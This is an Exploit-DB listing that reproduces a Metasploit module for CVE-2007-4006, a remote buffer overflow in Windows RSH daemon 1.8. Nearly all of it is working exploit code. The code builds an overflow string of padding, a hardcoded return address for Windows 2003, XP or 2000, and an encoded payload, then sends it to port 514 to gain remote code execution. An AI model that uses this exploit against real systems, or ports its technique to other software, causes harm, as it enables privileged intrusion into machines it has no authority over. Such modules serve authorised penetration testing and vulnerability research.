Windows RSH daemon Buffer Overflow

2010-04-30T00:00:00
ID EDB-ID:16427
Type exploitdb
Reporter metasploit
Modified 2010-04-30T00:00:00

Description

Windows RSH daemon Buffer Overflow. CVE-2007-4006. Remote exploit for windows platform

                                        
                                            ##
# $Id: windows_rsh.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Windows RSH daemon Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerabliltiy in Windows RSH daemon 1.8.
				The vulnerability is due to a failure to check for the length of input sent
				to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit
				to be successful.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
						['CVE', '2007-4006'],
						['OSVDB', '38572'],
						['BID', '25044'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 850,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
						[ 'Windows 2003 SP1 English',         { 'Ret' => 0x77409dbb } ],
						[ 'Windows XP Pro SP2 English',       { 'Ret' => 0x7e497c7b } ],
						[ 'Windows 2000 Pro SP4 English',     { 'Ret' => 0x77f81be3 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Jul 24 2007',
			'DefaultTarget' => 0))

		register_options([Opt::RPORT(514)], self.class)
	end

	def exploit
		connect

		sploit =  (("\x00" + rand_text_english(1)) * 2) + "\x00"
		sploit << rand_text_english(1024) + [target.ret].pack('V')
		sploit << payload.encoded

		print_status("Trying target #{target.name}...")

		sock.put(sploit)

		handler
		disconnect
	end

end